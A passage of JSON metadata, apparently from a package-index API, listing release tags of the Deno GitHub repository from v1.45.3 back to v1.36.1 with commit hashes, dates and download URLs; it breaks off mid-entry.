,"sha":"87ce64e57486fc006e82806c9ed8c49f11c2cb73","kind":"commit","published_at":"2024-07-22T21:34:15.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.45.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.45.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.45.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.3/manifests"},{"name":"v1.45.2","sha":"85de4280a1f9fae572a7331db6344cee123ddab7","kind":"commit","published_at":"2024-07-12T20:04:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.45.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.45.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.45.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.2/manifests"},{"name":"v1.45.1","sha":"c841d163e3dc344c06f10579672cc5e2b095933f","kind":"commit","published_at":"2024-07-11T18:46:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.45.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.45.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.45.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.1/manifests"},{"name":"v1.45.0","sha":"04ff5c731d55f2402e7b08e378eaf6e5a5a4d961","kind":"commit","published_at":"2024-07-10T22:08:02.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.45.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.45.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.45.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.0/manifests"},{"name":"v1.44.4","sha":"892e7c20ac6e7bc0601f4c23e64f43187c1b8479","kind":"commit","published_at":"2024-06-19T16:28:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.44.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.44.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.44.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.4/manifests"},{"name":"v1.44.3","sha":"ab2ab0f7fc4e7bda16544ef96a5e6ba114e799b5","kind":"commit","published_at":"2024-06-19T00:19:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.44.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.44.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.44.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.3/manifests"},{"name":"v1.44.2","sha":"9ca1320746072001feab9f6a26e9c1518609bd7b","kind":"commit","published_at":"2024-06-13T00:51:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.44.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.44.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.44.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.2/manifests"},{"name":"v1.44.1","sha":"e02a32be2797f7c107d19da8bf2aff5bbcd97bad","kind":"commit","published_at":"2024-06-05T23:05:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.44.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.44.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.44.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.1/manifests"},{"name":"v1.44.0","sha":"f3ffffc682604349b96dbe4ad33daa5dd1a09f63","kind":"commit","published_at":"2024-05-30T05:58:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.44.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.44.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.44.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.0/manifests"},{"name":"v1.43.6","sha":"7df3d5aeec14f24e5fdec1e1e6f5739f1fbeebbe","kind":"commit","published_at":"2024-05-21T23:34:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.6","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.6/manifests"},{"name":"v1.43.5","sha":"a13c4531fd2c08617767cc8a0788b9e20ac27d45","kind":"commit","published_at":"2024-05-18T00:22:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.5/manifests"},{"name":"v1.43.4","sha":"d64921c1906ee1ac39230c16abe9ff8c546bd645","kind":"commit","published_at":"2024-05-16T23:28:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.4/manifests"},{"name":"v1.43.3","sha":"d6ad253882a6c066e0c673ff64e6554a37bb3487","kind":"commit","published_at":"2024-05-10T20:37:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.3/manifests"},{"name":"v1.43.2","sha":"acd75bbd75fdf46c213d7b21093e09349318da5d","kind":"commit","published_at":"2024-05-08T22:21:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.2/manifests"},{"name":"v1.43.1","sha":"5ff881a0737eccceed55a0ace3ef3110d5b72b2f","kind":"commit","published_at":"2024-05-01T06:46:39.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.1/manifests"},{"name":"v1.43.0","sha":"5ff881a0737eccceed55a0ace3ef3110d5b72b2f","kind":"commit","published_at":"2024-05-01T06:46:39.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.0/manifests"},{"name":"v1.42.4","sha":"7cb23c5e3ee0b6c416f4c0e34c7c63fdf5024138","kind":"commit","published_at":"2024-04-16T00:17:02.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.42.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.42.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.42.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.4/manifests"},{"name":"v1.42.3","sha":"a64a257024c9933d90494613ac6b302cc69df6fa","kind":"commit","published_at":"2024-04-12T00:54:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.42.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.42.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.42.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.3/manifests"},{"name":"v1.42.2","sha":"04c0a4cbf7c00811d3ace3184c1cb8597a0e88f1","kind":"commit","published_at":"2024-04-11T06:39:03.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.42.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.42.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.42.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.2/manifests"},{"name":"v1.42.1","sha":"08f0613b390b289d07c6ea165bed0518809b34e8","kind":"commit","published_at":"2024-04-01T06:33:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.42.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.42.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.42.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.1/manifests"},{"name":"v1.42.0","sha":"9c6eca1064de029e560377bef831e69d22c5c00b","kind":"commit","published_at":"2024-03-28T00:47:33.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.42.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.42.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.42.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.0/manifests"},{"name":"v1.41.3","sha":"0d7662e1556a60bcc4b7075752fb2c2842b1afea","kind":"commit","published_at":"2024-03-14T18:13:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.41.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.41.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.41.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.3/manifests"},{"name":"v1.41.2","sha":"6d062cf0c79158a8c0c8a136c945c3eab2af8b50","kind":"commit","published_at":"2024-03-08T07:32:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.41.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.41.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.41.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.2/manifests"},{"name":"v1.41.1","sha":"8ccb9e954548d1a4d3ccbe065c28d6067d3fda03","kind":"commit","published_at":"2024-03-01T00:25:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.41.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.41.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.41.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.1/manifests"},{"name":"v1.41.0","sha":"118445103b019fbeb50eadc8d09d450fa8c33eee","kind":"commit","published_at":"2024-02-22T01:44:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.41.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.41.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.41.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.0/manifests"},{"name":"v1.40.5","sha":"2c97831fec0d335a474c4a599a5df345a23ef036","kind":"commit","published_at":"2024-02-15T05:22:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.40.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.40.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.40.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.5/manifests"},{"name":"v1.40.4","sha":"49214d309fc373a80a02f57545131b15f7813a98","kind":"commit","published_at":"2024-02-08T11:05:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.40.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.40.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.40.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.4/manifests"},{"name":"v1.40.3","sha":"887fd59486325ad99c183955b35fec07fd45516c","kind":"commit","published_at":"2024-02-01T06:27:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.40.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.40.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.40.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.3/manifests"},{"name":"v1.40.2","sha":"9a55a72cf195b2d5cee1e8598c7d28e4b1e8013a","kind":"commit","published_at":"2024-01-26T16:36:20.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.40.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.40.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.40.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.2/manifests"},{"name":"v1.40.1","sha":"b003ecec64782ebe3aa7e5b17728df2e6a6e2e39","kind":"commit","published_at":"2024-01-25T15:22:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.40.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.40.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.40.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.1/manifests"},{"name":"v1.40.0","sha":"9e575a286269c38c1af0a918a2a4ea4639a3004b","kind":"commit","published_at":"2024-01-25T02:48:50.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.40.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.40.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.40.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.0/manifests"},{"name":"v1.39.4","sha":"be4d0b7ad306312b0c01e1abc345e54b4e589ab6","kind":"commit","published_at":"2024-01-13T23:52:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.39.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.39.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.39.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.4/manifests"},{"name":"v1.39.3","sha":"aa23ccd1ae3b0c188336c0fd1d84deaed5fe13af","kind":"commit","published_at":"2024-01-12T14:58:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.39.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.39.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.39.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.3/manifests"},{"name":"v1.39.2","sha":"6af25c0592af46781b63bd43cf12d39b8aa61d09","kind":"commit","published_at":"2024-01-04T20:40:03.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.39.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.39.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.39.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.2/manifests"},{"name":"v1.39.1","sha":"68254ddc2060c32e6daa55aa3b33f82739655705","kind":"commit","published_at":"2023-12-21T15:46:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.39.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.39.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.39.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.1/manifests"},{"name":"v1.39.0","sha":"5b96f7bf21392620f0047687ec3b75b25b7ea9f2","kind":"commit","published_at":"2023-12-13T21:52:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.39.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.39.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.39.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.0/manifests"},{"name":"v1.38.5","sha":"172e5f0a0cea97ba27f7f6e46fb8f9b31f8dbbc6","kind":"commit","published_at":"2023-12-05T22:37:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.38.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.38.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.38.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.5/manifests"},{"name":"v1.38.4","sha":"8c07f52a7cbd6117e968383c94fe25b91c4c9242","kind":"commit","published_at":"2023-11-30T19:12:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.38.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.38.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.38.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.4/manifests"},{"name":"v1.38.3","sha":"3193e93912f87dd05871abb61f54297368f3f265","kind":"commit","published_at":"2023-11-24T03:49:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.38.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.38.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.38.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.3/manifests"},{"name":"v1.38.2","sha":"118be11e8c64fd6c4afb352b5095c02fa5571e8e","kind":"commit","published_at":"2023-11-17T05:57:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.38.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.38.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.38.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.2/manifests"},{"name":"v1.38.1","sha":"0e7ad0388be7413db6ded8b60d5ae5d7cc0ffda0","kind":"commit","published_at":"2023-11-10T11:46:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.38.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.38.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.38.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.1/manifests"},{"name":"v1.38.0","sha":"41877a0b3735d52db8b4f5047b1d4d61e37ba585","kind":"commit","published_at":"2023-11-02T01:01:47.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.38.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.38.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.38.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.0/manifests"},{"name":"v1.37.2","sha":"7282994df4f9c1748affa7c4455eea46a9e1a2e0","kind":"commit","published_at":"2023-10-13T00:14:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.37.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.37.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.37.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.37.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.37.2/manifests"},{"name":"v1.37.1","sha":"72c276d61a8b43abd3dbcf4f1440a2bf133fe0d2","kind":"commit","published_at":"2023-09-27T06:24:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.37.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.37.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.37.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.37.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.37.1/manifests"},{"name":"v1.37.0","sha":"997aa604dfd50c0f0ec6fd4db16b5034d2cfd726","kind":"commit","published_at":"2023-09-19T20:29:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.37.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.37.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.37.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.37.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.37.0/manifests"},{"name":"v1.36.4","sha":"c0617d11f6391f1b1b3afffe0152c73b5989ab80","kind":"commit","published_at":"2023-09-01T14:15:50.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.36.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.36.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.36.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.4/manifests"},{"name":"v1.36.3","sha":"55029c72618323014aa49317de9124375adeb13f","kind":"commit","published_at":"2023-08-24T16:01:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.36.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.36.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.36.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.3/manifests"},{"name":"v1.36.2","sha":"a7f5244a72cc6c00949c02a180d0d9cdf2bf1672","kind":"commit","published_at":"2023-08-21T13:39:22.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.36.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.36.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.36.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.2/manifests"},{"name":"v1.36.1","sha":"9f1455b75087e9e41a995bbb6a